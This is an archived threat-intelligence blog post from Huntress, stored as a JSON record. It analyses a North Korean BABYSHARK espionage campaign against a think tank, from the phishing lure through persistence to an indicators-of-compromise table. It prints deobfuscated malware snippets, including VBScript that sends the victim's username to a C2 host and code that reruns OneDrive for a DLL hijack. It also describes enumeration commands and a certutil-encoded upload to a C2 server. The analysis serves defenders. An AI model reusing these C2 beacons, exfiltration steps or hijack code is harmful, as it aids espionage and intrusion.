{
	"id": "78785649-af72-4b93-8bef-18a357c02cec",
	"created_at": "2026-04-06T00:16:21.485806Z",
	"updated_at": "2026-04-10T03:20:40.637366Z",
	"deleted_at": null,
	"sha1_hash": "e523d1625e8b6aa299ff32e9ef5e94326f61544e",
	"title": "Targeted APT Activity: BABYSHARK Is Out for Blood | Huntress",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 9893741,
	"plain_text": "Targeted APT Activity: BABYSHARK Is Out for Blood | Huntress\r\nArchived: 2026-04-05 16:19:56 UTC\r\ntl;dr: This blog follows the ThreatOps investigation of targeted DPRK (North Korean) backed cyber espionage efforts\r\nagainst Nuclear Think Tanks. It details the threat hunt from beginning to end, including how our ThreatOps analysts found\r\nthe threat, how our team peeled back the layers to analyze the malicious activity and how the threat actors phished their way\r\ninto the partner's network in the first place. Scroll to the bottom for indicators of compromise.\r\nOn February 16, Huntress discovered malicious and targeted advanced persistent threat (APT) activity within a trialing\r\npartner organization. This activity aligns with known tradecraft attributed to North Korean threat actors targeting national\r\nsecurity think tanks.\r\nThe uncovered malware family, dubbed BABYSHARK by other researchers, is used by a DPRK state-sponsored threat\r\nactor. This variant was significantly customized and tailored to the specific victim environment, indicating a targeted attack. \r\nIn this blog, we'll pull back the curtain on the technical details, our internal process of investigation and the lessons learned\r\nfor the greater security community.\r\nRight of Boom and Backwards\r\nThis story begins with our tried-and-true service: detecting persistence, or how hackers establish and maintain access to their\r\nvictim. \r\nDiscovering persistence mechanisms keys us in that there was undeniably malicious threat actor behavior. We start with this\r\nscene of the crime, and then work backward, unveiling new clues and breadcrumbs to uncover the full picture. \r\nOnce our 24/7 Security analysts identified the activity, we began an investigation to identify how deep the rabbit hole went.\r\nOur initial discovery was a scheduled task, masquerading with the name GoogleUpdater that ran a VBScript script\r\nqwert.vbs. 
This is a commonly used technique (MITRE ATT\u0026CK T1035.005) to blend in and avoid detection by sounding\r\nlike something legitimate—in this case, Google. Using a legitimate file (wscript.exe) to run the malicious script further helps\r\nto avoid detection that is based on scanning of the binary that is running. \r\nqwert.vbs included code to reach out to a Google Drive file. \r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 1 of 16\n\nViewing this Google Drive file, it turns out to be completely blank: an empty file. Note the lengthy filename at the very top\r\nof the display, however. \r\nDownloading the page with curl, we can see the HTML source of the Google Drive page—which does not appear to be\r\novertly malicious upon first glance. But taking a closer look, we uncovered some odd \"markers\" in the lengthy file name\r\ndisplayed.\r\nAside from what looked like gibberish, there were the strings \"manage\" with parentheses following it—almost to look like a\r\nfunction call, as if the parameters d=7 were passed in. Immediately following it was a johnbegin-- and a significant amount\r\nof nonsense characters, and eventually a --johnend string. The johnbegin and johnend text seemed to be delimiters to wrap\r\naround the random data… perhaps that was encoded data in some way!\r\nWith that breadcrumb, our ThreatOps team began looking over open-source research online to determine if others have seen\r\nthese \"johnbegin\" and \"johnend\" markings.\r\nNorth Korea's recent BabyShark malware works with the fileless technique by downloading encrypted malicious scripts\r\nfrom Google drive. 
Malicious scripts distinguish between start and end with \"johnbegin\" and \"johnend\".\r\npic.twitter.com/6INRjQeecs\r\n— IssueMakersLab (@issuemakerslab) March 21, 2020\r\nThanks to some shared intelligence by Palo Alto's Unit42, malware reporting sites and others, we were able to discover that\r\nthese delimiters were key indicators of a strain of malware dubbed BABYSHARK, known for being used by North Korean\r\nstate-sponsored threat actors. \r\nDoing our due diligence to read up on the great analysis and research from those who have seen this in the wild before us, it\r\nwas clear the previous sightings dated back to the 2018-2019 timeframe. For this specific incident, the first indicators of\r\ncompromise we uncovered were in March of 2021.\r\nKnowing that we were now digging into malicious APT activity, we deployed our Process Insights functionality to\r\nthis host and organization for even greater visibility.\r\nPeeling Back the Layers\r\nWith a better understanding of what we were looking at, we continued to dig through the qwert.vbs sample. \r\nFrom reading the code, we could see that this scheduled VBScript would download the contents of this Google Drive page\r\non first execution and carve out the obfuscated data between the johnbegin and johnend delimiters to be saved as a file\r\nnormal.crp. Later, upon second execution by the scheduled task, the script deobfuscates the saved data and executes it as\r\nVBScript.\r\nConsidering we can see the deobfuscation routine, we can run that on our own and unravel what actual code would be\r\npresent and executed from normal.crp.\r\nNote: This screenshot is an excerpt of the code present and the full file can be reviewed with the gist link above.\r\nThere is a lot to unpack and discuss within this VBScript code. 
We will start with the most interesting observation: the\r\nmalware checks the current username.\r\nThe Cast of Characters\r\nWe want to emphasize that the observed APT activity is highly targeted against this organization and affiliated individuals. \r\nThe target organization fits the category of \"think tanks,\" as alluded to in the very beginning of this post. Additionally, this\r\ntarget's computer had a hostname referring to the owner and user—who, for partner confidentiality, we'll refer to as Alex.\r\nAlex's computer was not the only host in this organization that Huntress was supporting—other devices with a hostname\r\nbased on their user were visible to us, but during the time of our analysis, only Alex's machine was online. To tell the whole\r\nstory, we knew we needed access to another important user's machine. We will refer to this user as Bob.\r\nNotice that the normal.crp file specifically checks for the presence of the username \"Administrator,\" or our newly introduced\r\ncharacter, \"Bob.\" The malware would not run if it was not under Bob. If the current username did not match either of these\r\ntwo names, the malware would reach out to an HTTP C2 server and then stop itself from executing on the\r\nsystem.\r\nThis was particularly interesting to us. This attack was tailored to focus only on Bob. If (and only if) the username matched\r\nBob, then it would add persistence mechanisms in the Windows registry, stage new obfuscated files, and continue\r\ncommunications with its C2 servers.\r\nFollowing Breadcrumbs\r\nNoting the newly discovered activity from normal.crp, we found several other persistence mechanisms on the host. 
We\r\ndiscovered the scheduled task named Microsoft-Windows-UpdateDefender that used another VBS script called sys0.vbs to\r\nopen up a registry key HKEY_CURRENT_USER\\Software\\RegisteredApplications\\[random] and perform some string\r\nreplacement on the data stored there and execute the contents.\r\n(This filename sys0.vbs differs from the suggested sys1.vbs name in the recovered normal.crp script, but after finding both\r\nrenditions on different hosts, both contain the same contents.)\r\nExamining the contents of the task file showed that the commands were executed every 29 minutes, while sys1.vbs would\r\nbe executed every 61 minutes.\r\nThis was also confirmed by looking at the data collected by Process Insights. Process Insights is the newest addition to The\r\nHuntress Managed Security Platform, offering greater visibility and telemetry on actions performed on an endpoint at the\r\nprocess level. This captures information like process spawn time, origination, path and any subsequent child process data—\r\nin real-time. 😉\r\nThe filexx.tmp and schedxx.tmp files were written to disk as a means of checking if this code was executed previously. These\r\nfiles were not present on Alex's machine at the time of our analysis.\r\nThe registry value at\r\n\"HKEY_CURRENT_USER\\Software\\RegisteredApplications\\AppXr1bysyqf6kpaq1aje5sbadka8dgx3g4g\" contained even\r\nmore VBScript code.\r\nThis code reached out to a C2 domain to retrieve the contents for yet another new file, desktop.tmp, if it was not already\r\npresent. This code is exactly in line with what we uncovered from the normal.crp, but it pulls from a different C2 domain\r\n(worldinfocontact[.]club rather than hodbeast[.]com). 
\r\nThe distinction between these domains seemed to be that worldinfocontact[.]club is their beaconing command and control. It\r\nreached out to this C2 on a set interval, retrieved any pending commands to be executed, slept, then executed those new\r\ntasks. The response from worldinfocontact[.]club /111/alex/expres[.]php?op=2 was inherently going to vary from time to\r\ntime as the threat actors queued new commands and scripts to execute remotely.\r\nThe contents of desktop.tmp therefore changed over time, as they were the last set of commands sent by the C2 server. \r\nThe desktop.tmp file contents we uncovered on Alex's machine were obfuscated commands to run the OneDrive.exe\r\nprocess. It is fair to say that this is the \"fallback\" procedure from the C2 (when no other commands were pending) to ensure\r\nwhatever DLL hijacking they set up would continue to execute, even if the OneDrive process was stopped. We will revisit\r\nthe alleged DLL hijacking technique in our analysis of other artifacts soon.\r\nThe deobfuscated desktop.tmp from Alex's host is below:\r\nOn Error Resume Next:Set wShell=CreateObject(\"WScript.Shell\"):retu=wShell.run(\"\"\"%userprofile%\\AppData\\Local\\Microsoft\\OneDrive\\onedrive.exe\"\" /background\",0,false)\r\nBear in mind that this was returned from the worldinfocontact[.]club endpoint. 
hodbeast[.]com, on the other hand,\r\nreturned obfuscated syntax that would ultimately run some enumeration commands and write the output to a file ttmp1.log.\r\ncmd.exe /c PowerShell Get-Process outlook ^| Format-List Path \r\ncmd.exe /c whoami\r\ncmd.exe /c net user\r\ntasklist\r\nThe ttmp1.log file is then Base64 encoded with certutil -f -encode to be saved as ttmp.log and then uploaded to\r\nhttps[:]//hodbeast.com/silver/upload[.]php with a POST request.\r\nThis data exfiltration technique is in line with previous sightings and is documented on the MITRE ATT\u0026CK page for\r\nBABYSHARK malware.\r\nFinally, other files present on Alex's machine were desktop.r5u and desktop.xml. These files had identical contents. The\r\n\"BEGIN\" and \"END\" certificate delimiters indicate this file would also be unraveled with certutil.\r\ndesktop.r5u and desktop.xml decode to a RAT.\r\nLooking at the first few characters (]TVqQAA) we can see that this is probably a base64 encoded PE file. Indeed, using\r\nCyberChef, we can decode the base64 text to obtain a DLL file. \r\nLoading the DLL in pestudio reveals a pdb path that leaves nothing to the imagination:\r\n\"H:\\Hollow\\googleDrive_rat_load_complete\\rat_load\\Release\\rat_load.pdb\"\r\nIt's worth noting that this file cannot be found in VirusTotal. 
While we have not yet finished our analysis on this DLL, it is\r\nnot a stretch to consider this could be a variant of the KimJongRAT known to be often used alongside BABYSHARK.\r\nThe desktop.xml file seems to copy itself to (or possibly check for) the desktop.r5u file in the %appdata\\roaming\\Microsoft%\r\ndirectory, as this path can be found hardcoded in the binary.\r\nIt also contains references to the following DLLs within an embedded PE file:\r\nThe exports from this binary are as follows: \r\nIf there weren't already enough moving pieces to this story, we uncovered even more activity through wscript.exe with our\r\nProcess Insights capability. Alongside the running scheduled tasks, there was an occurrence of a script CF8C.vbs being run\r\nout of Alex's temporary directory. \r\nwscript.exe C:\\Users\\Alex\\AppData\\Local\\Temp\\CF8C.vbs [MoreVBScript]\r\nThis CF8C.vbs file was no longer present on the host, but considering it had practically the contents of another script passed\r\nas another argument, it was clear it would again deobfuscate or substitute symbols and execute more VBScript.\r\nThis deobfuscated VBScript reaches out to a OneDrive link, a tactic once again referenced in other public research, then\r\ndeobfuscates and executes the supplied VBScript.\r\nThis decodes to...\r\nOn Error Resume Next:Set fs = CreateObject(\"Scripting.FileSystemObject\"):Set ws=CreateObject(\"WScript.Shell\"):Set p0\r\n= CreateObject(\"msxml2.xmlhttp\"):scriptdir = ws.ExpandEnvironmentStrings(\"%appdata%\"):userdir =\r\nws.ExpandEnvironmentStrings(\"%userprofile%\"):username =\r\nlcase(ws.ExpandEnvironmentStrings(\"%username%\")):username=Escape(username):username=Replace(username,\"%u\",\"\"):chk=\"no\":username=lcas\r\n\"GET\", \"https://frebough.com/onedrive/winmm.php?op=\" +username,false:p0.setRequestHeader 
\"Content-Type\",\r\n\"application/x-www-form-urlencoded\":p0.Send\r\nPresumably, this is to tell yet another C2 server that this step is completed. It does not seem to execute more code from the\r\nresponse.\r\nAdditional Artifacts\r\nAlongside the qwert.vbs file we found on Alex’s host, we uncovered multiple other strange files.\r\nr.vbs seemed to kill the OneDrive.exe process, wait three seconds, and remove a version.dll file present in the same directory\r\nas the OneDrive executable. Then, five seconds later, it runs the OneDrive.exe process once more.\r\nOn Error Resume Next\r\nSet wShell=CreateObject(\"WScript.Shell\")\r\nretu=wShell.run(\"cmd.exe /c taskkill /im onedrive.exe /f \u0026 timeout 3\u0026 del\r\n\"\"%userprofile%\\AppData\\Local\\Microsoft\\OneDrive\\version.dll\"\"\",0,true)\r\nhttps://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood\r\nPage 8 of 16\n\nretu=wShell.run(\"cmd.exe /c timeout 5\",0,true)\r\nretu=wShell.run(\"\"\"%userprofile%\\AppData\\Local\\Microsoft\\OneDrive\\onedrive.exe\"\" /background\",0,false)\r\nUnfortunately we were unable to find the version.dll file on Alex's host or any other affected machines. Considering the file\r\nplacement, this looks to be a known DLL hijacking technique to run additional code.\r\nConsidering this script removes the version.dll file, once again runs OneDrive with normal execution, and the slight\r\nfilename “r.vbs” perhaps this is a mechanism to “remove” another implant. We later discovered this same code on Bob’s\r\nmachine under the filename 1.vbs.\r\nAdditionally, a dev.ps1 file was found on the affected host. This used inline C# code within PowerShell to seemingly track\r\nGoogle Chrome and Microsoft Edge tabs, monitor the use of Browser Developer Tools and log these to a tabid_chrome.log,\r\ntabid_edge.log and a living.log file that was updated the current date and time. 
These log files contained nothing more than\r\nan identification number for each tab, but we could see from the living.log file that this code was actively running on the\r\nvictim.\r\n(We later discovered dev.vbs on Bob’s machine which looks to kickstart the dev.ps1 file—also present with the same\r\ncontents under the filename onenote.vbs.)\r\nOn a separate user’s machine (we will call them Charlie for the sake of storytelling) we discovered the onenote.vbs file with\r\nslightly different contents to invoke the PowerShell script with a different technique, as well as a new pow.ps1 that looked to\r\nremove Google Chrome security preferences.\r\nPutting the Puzzle Pieces Together\r\nWhile we continued to do analysis on the files and threads we uncovered, we knew we were slowly building the big picture\r\nof this attack chain. Considering how BABYSHARK malware would traditionally be run, we knew we were still missing\r\none critical piece of information: the initial access where this all started from. Where was the phish?\r\nThe first step in finding initial access was to figure out the timeframe of the compromise. To do that, we searched for other\r\ninteresting files on the machines. The earliest found script file was the sys0.vbs script we found earlier. The timestamps for\r\nthis file placed our timeline starting on March 9, 2021. This helped us narrow down the timeframe from when the malicious\r\ndocument(s) may have been downloaded.\r\nThe APT group is known to use spear phishing emails with malicious links embedded or malicious documents attached to\r\ngain access, so we started hunting for them on the system. Being extremely cautious of what we could dig through, we\r\nexamined only suspicious Microsoft Office documents from the early months of 2021.\r\nUnfortunately, we couldn’t find a smoking gun. 
But at that time, only Alex's computer was online and communicating with\r\nHuntress.\r\nAs we communicated with this trialing partner, explaining what we uncovered and the gravity of this incident, they notified\r\nthe players involved. Soon enough, the other compromised machines (Bob's and Charlie's, specifically) came online.\r\nWith those hosts now accessible to Huntress, we could correlate what files were present across all of these compromised\r\nmachines. While the AV product the organization was using did not stop the intrusion, it at the very least had logs of what\r\nfiles were scanned and when.\r\nUsing the logs across all three hosts, we uncovered only a handful of files that were present on each host. The most\r\ninteresting file that stuck out to us was VOA_Korea.zip. From the logs, we could tell it had a .doc file inside of it, and this\r\nseemed promising. We also noticed that the scanning of the ZIP file and its contents failed. This could be indicative of\r\npassword protection.\r\nIf you hadn’t caught on to the acronym, the VOA in this case refers to the Voice of America media organization. Voice of\r\nAmerica is an international broadcasting station in the United States, focusing on offering information and news from\r\ncountries and continents all over the world.\r\nAttempting to retrieve the VOA_Korea.zip file, it was unfortunately no longer present on any of the compromised\r\nmachines.\r\nAV logs revealed that the end user attempted to download this file two times.\r\nFinding the Phish\r\nThere was still a VOA_Korea (1).zip that was present and we were able to retrieve the file. Uncompressing the archive, we\r\nhit another wall—the .doc file was password protected. 
This doubles as a sneaky phishing tactic and a way to potentially\r\nhide malicious macros from antivirus software.\r\nIt was at this point that we went from hunting to hacking and started trying to crack open the file. We do say our offense is\r\nyour defense, after all! 😉\r\nAfter throwing combinations of John The Ripper and Hashcat with different wordlists and rule files, eventually, a boring,\r\nbasic bruteforce found the password: voa2021.\r\nWith a rush of adrenaline, we went to examine the decrypted Microsoft Word document, opting for one of the quickest tools\r\nfor macro analysis, olevba.\r\nThe .doc file lit up like a Christmas tree.\r\nWe found the malicious macro document used for initial access! After some quick deobfuscating (same technique as seen\r\npreviously), we could see the whole picture for this attack.\r\nThis macro tells the story behind almost every puzzle piece we had uncovered previously. It:\r\nChecks for the presence of OneDrive\r\nDownloads a new Microsoft Word document to show the user and convince them of the phish:\r\n(http[:]//beastmodser.club/sil/0304/VOA_Korea[.]docx)\r\nChecks for the presence of antivirus products like BitDefender or Norton Security, and quits if present\r\nDisables Microsoft Word macro protections in the registry\r\nDownloads a version.tmp file to be then moved and renamed as version.dll for the OneDrive DLL hijacking attack\r\n(https[:]//beastmodser.club/sil/0304/d[.]php?na=version.gif)\r\nStarts OneDriveStandaloneUpdater.exe to begin the DLL hijacking attack\r\nChecking for the presence of antivirus or security software is a common technique for sophisticated malware samples, and\r\nhere it adds to the stealth of the operation. 
The malicious macro bailing out and not detonating if certain products are\r\npresent makes this even more targeted.\r\nWhile this explained the version.dll, unfortunately, we were unable to retrieve the original file from the malicious hosting\r\nURL. Neither the faked VOA_Korea.docx file nor the DLL was still present on the newfound beastmodser[.]club domain…\r\nbut it is at least known evil. 😉\r\nOther reports on BABYSHARK malware have explained how it disables macro warnings and Microsoft Office security\r\nprotections. This was very evident in the code run by the macro…changing registry values to disable defenses across\r\npractically every version of Microsoft Word.\r\nA quick synopsis of the commands run within that macro:\r\nLures and Phishbait\r\nWith the discovery of the initial attack vector and phishing document, and after analysis of the pertinent files to determine\r\nthe scope of this attack, we felt this investigation was coming to a close. But even after finding the malicious macro, we\r\nwere still curious—what convinced Alex to open this file?\r\nThe “lure” looked safe and secure, tucked away inside of a ZIP file with a password-protected document… what was the\r\npretense?\r\nWe asked the trialing partner if they could find the original email. Here we showcase a fascinating back-and-forth with some\r\ncunning deception and a well-played scheme.\r\nThe threat actor reaches out to Alex under the guise of collecting info for the VOA, masquerading as a real VOA author (that\r\nauthor link is legitimate, along with the Twitter profile). There is no attachment—they ask for input from the victim.\r\nAlex falls for the bait, but there is at least one clue that suggests this may have originated from an illegitimate source:\r\nVoice of America probably doesn’t use Yahoo as their email provider. 
🥴\r\nAlex has no cause for concern here—they sent back a document with answers to the questions. For the final trick, our\r\nthreat actor suggests they have “made some edits” and are sending the last copy back for final approval. To “be secure,” the\r\ndocument is password protected. 😈\r\nThere is the smoking gun—a OneDrive link with the hosted download for our VOA_Korea.zip file, containing the password-protected Word document whose macro kickstarts this compromise.\r\nThinking back to the malicious VBScript, wasn’t the target Bob, and not Alex? The threat actor may have used a roundabout\r\nmethod to get the true victim… but it worked.\r\nAlex forwarded the email to their co-workers for their approval and carbon-copied the other victims.\r\nThere is no further correspondence in the email chain. The threat actor had what they wanted, and the victims were unaware\r\nthey had just been phished—because it was, after all, a very clever ploy.\r\nAfter we had finished our investigation and shared everything learned with the targeted organization, we continued our\r\nanalysis. We found one particularly interesting news article dating back to December of 2021: “Hackers use fake media\r\ndomains to trick North Korea researchers”... specifically VOA, under the very same guise.\r\nLooking back, this was very clever malware filled with living-off-the-land techniques, using normally trusted software with\r\nOneDrive and Google Drive, staged with a particularly stealthy phishing lure… but, we were disappointed in what earned the\r\ndamning click.\r\nThe malicious Word document itself is the most cookie-cutter, vanilla phish bait that one might see in generic and bland\r\ncybersecurity training. 
Despite how often security professionals scream and shout about these barebone basics of security\r\nhygiene, this can still slip by and damage an organization.\r\n“Please click here” is all an APT needs.\r\nLessons Learned\r\nThe adversary here is likely a well-funded nation-state-supported threat actor, whose operations are known for their phishing\r\nprowess and building trust or a connection before dangling the lure. The remote access trojan and data exfiltration\r\ncapabilities have been present and active in the target environment for nearly a year.\r\nWe tend to share statistics and infographics about hacker dwell-time being weeks, or months, but this malware has gone\r\nunnoticed for much longer. While the victim organization had antivirus, the threat still slipped past. From our own analysis,\r\nlooking through the logs, it is disheartening to see the exact moment where prevention efforts fell short.\r\nWith that, we offer a gentle reminder: prevention will fail. There is immense value, though, in logging, monitoring, and\r\nhunting. All the threads of this story could not have unfolded without the data retention and logged information available to\r\nour team of analysts and investigators.\r\nWhether the infecting malware stems from an unskilled actor, just grabbing code off the shelf, or a trained and sophisticated\r\nAPT, detection and human analysis must be in play.\r\nThe Huntress Managed Security Platform has been adding more features and functionality to enrich our partners'\r\nreporting and insight. 
Combining the powers of each of these services (Persistent Footholds, Managed Antivirus, Process\r\nInsights, etc.), we can gain a greater understanding of incidents and compromises—and for finding APT activity on a trialing\r\npartner's system, we hope that offers a great example.\r\n• • •\r\nSpecial thanks to analysts, researchers, account representatives, engineers and all involved in response to this\r\nincident and their contributions to this blog: Cat Contillo, Matt Anderson, Caleb Stewart, Dave Kleinatland, John\r\nHammond, Matthew Brennan, Tim Kasper, Clarissa Bove, Jamie Levy, Max Rogers, Greg Ake, Rob Noeth and Sharon\r\nMartin.\r\nIndicators of Compromise\r\nType | Item | Notes / sha256 Hash\r\nURL | retmodul[.]com | Accessed during execution of normal.crp. May be used to attack.\r\nURL | hodbeast[.]com | Staging C2 url\r\nURL | worldinfocontact[.]club | Beaconing C2 url\r\nURL | frebough[.]com | Staging C2 url\r\nURL | beastmodser[.]club | Staging C2 url\r\nStrings | H:\\Hollow\\googleDrive_rat_load_complete\\rat_load\\Release\\rat_load.pdb | String in desktop.xml and desktop.r5u\r\nRegistry Key | HKEY_CURRENT_USER\\Software\\RegisteredApplications\\[random characters] | Contained code that was executed by sys0.vbs\r\nFile | c:\\Users\\\\AppData\\Roaming\\desktop.tmp | 5b31d65b0607ae3de40ff8376bb83f3ff4defba3b564c380be\r\nFile | C:\\Users\\\\AppData\\Roaming\\r.vbs | c86d6e9dfc79bdf29f0826327992f8cf3df3e1ed6b41f1c8f6e\r\nFile | C:\\Users\\\\AppData\\Roaming\\1.vbs | c86d6e9dfc79bdf29f0826327992f8cf3df3e1ed6b41f1c8f6e\r\nFile | C:\\Users\\\\Microsoft\\sys0.vbs | bf82675bac2cd574fa8b87659217bffb29d4bc49b355b405a\r\nFile | C:\\Users\\\\Microsoft\\sys1.vbs | bf82675bac2cd574fa8b87659217bffb29d4bc49b355b405a\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\desktop.xml | As a certificate: 2ad3266331e405677c68bb43c490467107ca398d3ce43008; Converted DLL: e314b40449b7b9b84f20f49f89888511433573377e007e5c1\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\desktop.r5u | As a certificate: 2ad3266331e405677c68bb43c490467107ca398d3ce43008; Converted DLL: e314b40449b7b9b84f20f49f89888511433573377e007e5c1\r\nFile | C:\\Users\\\\AppData\\Local\\Microsoft\\OneDrive\\version.dll | [hash unavailable]\r\nFile | C:\\Users\\\\AppData\\Local\\Microsoft\\OneDrive\\version.tmp | [hash unavailable]\r\nFile | C:\\Users\\\\AppData\\Roaming\\normal.crp | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca4\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\qwert.vbs | e08fe0b287b4d112514276c2b102b9c80b4dab73257f06ab\r\nFile | C:\\Users\\\\AppData\\Microsoft\\ttmp.log | [hash unavailable]\r\nFile | C:\\Users\\\\AppData\\Microsoft\\filexx.tmp | Checked by normal.crp for run status, created if not run pr are 111\r\nFile | C:\\Users\\\\AppData\\Microsoft\\schedxx.tmp | Checked by normal.crp for run status, created if not run pr are 111\r\nFile | C:\\Users\\\\AppData\\Local\\Temp\\CF8C.vbs | [hash unavailable]\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\dev.ps1 | def0975728fc5da61c022bb62b7160e2764631b852ec7f839\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\pow.ps1 | d41c943fd5ffacde74f487df6a43b72e9730f05812b9b1f8dc\r\nFile | c:\\users\\\\appdata\\roaming\\Microsoft\\living.log | (Hash varies based off the current time)\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\tabid_chrome.log | (Hash varies due to logging)\r\nFile | C:\\Users\\\\AppData\\Roaming\\Microsoft\\tabid_edge.log | (Hash varies due to logging)\r\nFile | c:\\Users\\\\AppData\\Roaming\\microsoft\\Windows\\start menu\\Programs\\Startup\\OneNote.vbs | c327631a212e4a9681e3cf1574c500ce3700186cc605ae08d (Note: hash may vary across different machines)\r\nJohn Hammond. Threat hunter. Education enthusiast. Senior Security Researcher at Huntress.\r\nSource: https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.huntress.com/blog/targeted-apt-activity-babyshark-is-out-for-blood"
	],
	"report_names": [
		"targeted-apt-activity-babyshark-is-out-for-blood"
	],
	"threat_actors": [],
	"ts_created_at": 1775434581,
	"ts_updated_at": 1775791240,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e523d1625e8b6aa299ff32e9ef5e94326f61544e.pdf",
		"text": "https://archive.orkl.eu/e523d1625e8b6aa299ff32e9ef5e94326f61544e.txt",
		"img": "https://archive.orkl.eu/e523d1625e8b6aa299ff32e9ef5e94326f61544e.jpg"
	}
}